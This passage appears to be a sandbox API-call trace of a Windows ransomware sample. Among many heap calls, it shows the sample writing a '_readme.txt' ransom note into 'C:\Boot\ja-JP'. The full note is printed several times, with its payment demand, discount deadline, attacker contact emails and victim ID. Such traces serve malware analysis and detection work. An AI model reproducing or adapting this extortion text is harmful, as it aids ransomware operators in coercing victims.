hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.012] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.012] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.013] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0128.013] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.014] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.014] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.014] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.014] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.014] PathFindFileNameW (pszPath="") returned="" [0128.014] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0128.015] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0128.015] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0128.015] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0128.015] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.015] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0128.015] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0128.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.015] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0128.015] FreeLibrary (hLibModule=0x759d0000) returned 1 [0128.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0128.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.015] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.015] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0128.016] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0128.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.016] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.016] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0128.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0128.016] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.016] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0128.016] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0128.016] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0128.017] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0128.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0128.017] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0128.017] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0128.017] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0128.017] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0128.017] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0128.018] CloseHandle (hObject=0x5c4) returned 1 [0128.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0128.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0128.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0128.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0128.018] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.018] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0128.018] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.018] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.018] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0128.018] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0128.018] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe386c600, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe386c600, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe386c600, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0128.018] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0128.019] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0128.019] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0128.019] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: 